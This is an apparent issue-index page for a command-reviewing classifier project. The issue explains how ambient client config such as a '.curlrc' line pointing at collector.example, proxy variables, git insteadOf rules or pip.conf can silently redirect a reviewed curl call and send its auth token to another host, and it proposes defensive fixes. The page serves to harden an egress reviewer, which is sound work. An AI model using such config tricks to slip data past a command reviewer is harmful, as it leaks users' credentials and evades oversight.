Ambient client config (.curlrc, proxies) can redirect a reviewed egress command
Nobody has claimed this yet.
Assessment
- Difficulty
- 5/5
- Estimated time
- Over a week
- Newbie friendliness
- 35/100
- Issue type
- Feature
- Clarity
- Mostly clear
- Activity status
- Active
- Tech stack
- bash, git, python, typescript
Research direction
Start with the intent plan in issue #70 and trace the host input replacement, reviewer state, and cache-key handling. Decide whether ambient configuration should be ignored or measured, then verify that reviewed egress cannot be redirected by the listed client configuration and that the chosen state is reflected in review and caching.
Written by the indexing model from the issue text.
Description
The intent plan (#70) sends all network egress to the reviewer, but neither stage can see ambient client config. A url = https://collector.example/ line in ~/.curlrc adds a second transfer, and -H headers apply to every URL, so a reviewed, user-requested curl -H "Authorization: ..." https://api.provider.com/... also sends the token elsewhere. Same class: proxy/insecure in .curlrc, HTTPS_PROXY, git insteadOf/http.proxy, .npmrc registry, pip.conf, sitecustomize.py.
Options:
- Rewrite allowed egress to ignore ambient config (
curl -q,env -u HTTPS_PROXY -u HTTP_PROXY -u ALL_PROXY,python3 -I) via the host input replacement. - Or measure the relevant config files and include them in the reviewer state and cache key.
Today this is a stated residual in the plan.
- Dominant language
- TypeScript
- Stars
- 0
- Forks
- 1
- Avg merge
- 1h 20m
- Merged PRs (30d)
- 32
Contributor guide
No contributing guide indexed for this repository
First steps
- Read the whole issue, then the project's contributing guide.
- Comment on the issue to say you are picking it up — it saves two people doing the same work.
- Fork the repository and make your change on a branch.
- Open a pull request that references the issue number.
More from STRML/omp-classifier
-
Difficulty 2/5 1-3 hours Newbie friendliness 85/100
STRML/omp-classifier#81 ·
-
Difficulty 2/5 1-3 hours Newbie friendliness 82/100
STRML/omp-classifier#80 ·
-
Difficulty 2/5 1-3 hours Newbie friendliness 88/100
STRML/omp-classifier#78 ·
-
Difficulty 5/5 Over a week Newbie friendliness 30/100
STRML/omp-classifier#84 ·
-
Difficulty 3/5 1-2 days Newbie friendliness 72/100
STRML/omp-classifier#82 ·
All issues in STRML/omp-classifier
Similar issues
-
Browser Waiting for: Product Owner
Difficulty 2/5 1-3 hours Newbie friendliness 85/100
getsentry/sentry-javascript#24577 · 1 comment ·
-
Difficulty 2/5 1-3 hours Newbie friendliness 78/100
agilepathway/label-checker#640 ·
-
Difficulty 2/5 1-3 hours Newbie friendliness 84/100
copse-dev/agent-pane#2953 ·
-
agentic-workflows
Difficulty 1/5 Under an hour Newbie friendliness 85/100
githubnext/rig#534 ·
-
automation missing-model model-sync provider:pioneer
Difficulty 2/5 1-3 hours Newbie friendliness 76/100
anomalyco/models.dev#7701 ·